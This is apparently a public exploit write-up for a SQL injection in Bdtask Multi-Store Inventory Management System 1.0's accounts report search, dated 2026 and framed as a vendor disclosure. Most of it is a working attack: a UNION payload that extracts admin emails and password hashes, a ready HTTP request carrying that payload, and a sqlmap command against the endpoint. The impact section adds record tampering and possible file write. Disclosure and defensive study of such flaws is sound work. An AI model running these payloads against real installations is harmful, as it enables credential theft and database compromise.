## https://sploitus.com/exploit?id=D20999AF-07A6-515E-8A76-43F97543FBBF
# CVE-PENDING: Bdtask Multi-Store Inventory Management System 1.0 - SQL Injection
## Vulnerability Information
| Field | Detail |
|-------------|--------------------------------------------|
| **Product** | Multi-Store Inventory Management System |
| **Vendor** | Bdtask |
| **Version** | 1.0 |
| **Type** | SQL Injection (CWE-89) |
| **Author** | Kevin Chiang |
| **Date** | 2026-05-04 |
| **CVSS** | 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N) |
---
## Affected Component
- **File**: `application/modules/accounts/controllers/Accounts.php`
- **Function**: `accounts_report_search()`
- **Parameter**: `dtpToDate` (POST)
---
## Description
A SQL injection vulnerability was found in bdtask Multi-Store Inventory
Management System 1.0. It affects the function `accounts_report_search()`
of the file `application/modules/accounts/controllers/Accounts.php`.
The manipulation of the argument `dtpToDate` leads to SQL injection.
The attack may be initiated remotely. An admin-level account is required.
The root cause is direct string interpolation of user input into the SQL
query via CodeIgniter's Query Builder `where()` method without using
parameterized queries:
```php
// Accounts_model.php (simplified)
$this->db->where('VDate BETWEEN "'.$dtpFromDate.'" and "'.$dtpToDate.'"');
```
---
## Steps to Reproduce
### Environment
- OS: Ubuntu 22.04.5 LTS
- Web Server: Apache 2.4.18
- PHP: 7.0.5
- Test URL: `http://localhost:8080/`
### Steps (Browser โ No Tools Required)
1. Install Multi-Store Inventory Management System v1.0 on a local
XAMPP environment
2. Log in with an **admin** account
3. Navigate to: **Accounts โ Account Reports โ General Ledger**
4. In the report form, select any **GL Head** from the dropdown (the selected GL code value will be submitted as `cmbGLCode`)
5. Leave **Transaction Head** blank
6. Set **From Date** to `2000-01-01`
7. Set **To Date** to the payload below
8. Click **Search**
---
## Proof of Concept
### Payload โ UNION-based (Credential Extraction)
Paste the following into the **To Date** field:
```
2099-01-01" UNION SELECT email COLLATE utf8_unicode_ci,0,0,password COLLATE utf8_unicode_ci,0,0,0 FROM user LEFT JOIN acc_transaction ON 0=1 WHERE "1"="1
```
**Expected Result**: The report table displays admin email and
MD5 password hash from the `user` table.
> **Note**: `COLLATE utf8_unicode_ci` is required to resolve the charset
> mismatch between the `user` table (`utf8_general_ci`) and
> `acc_transaction` table (`utf8_unicode_ci`).
> `LEFT JOIN acc_transaction ON 0=1` satisfies CodeIgniter's
> auto-appended `AND acc_transaction.COAID IS NULL` condition.
### Vulnerable HTTP Request
```http
POST /accounts/accounts/accounts_report_search HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data
Cookie: ci_session=[your-session-id]
cmbGLCode=40216&dtpFromDate=2000-01-01&dtpToDate=2099-01-01" UNION SELECT email COLLATE utf8_unicode_ci,0,0,password COLLATE utf8_unicode_ci,0,0,0 FROM user LEFT JOIN acc_transaction ON 0=1 WHERE "1"="1
```
---
### SQLmap Command
```bash
sqlmap -u "http://localhost:8080/accounts/accounts/accounts_report_search" \
--data="cmbGLCode=40216&dtpFromDate=2000-01-01&dtpToDate=2026-05-04" \
--cookie="ci_session=YOUR_SESSION_COOKIE" \
--level=3 --risk=2 \
--dbms=mysql \
--batch --dbs \
-p dtpToDate
```
---
## Impact
An authenticated admin attacker can:
- Extract all database contents including user credentials
- Retrieve MD5-hashed passwords for offline cracking
- Modify or delete arbitrary database records
- Potentially achieve OS-level file write via `INTO OUTFILE`
---
## Vendor Notification
| Date | Action |
|------------|--------------------------- |
| 2026-05-04 | Vendor notified via email |
| 2026-06-04 | Public disclosure deadline |
---
## References
- Vendor homepage: https://www.bdtask.com/
- VulDB submission: (pending)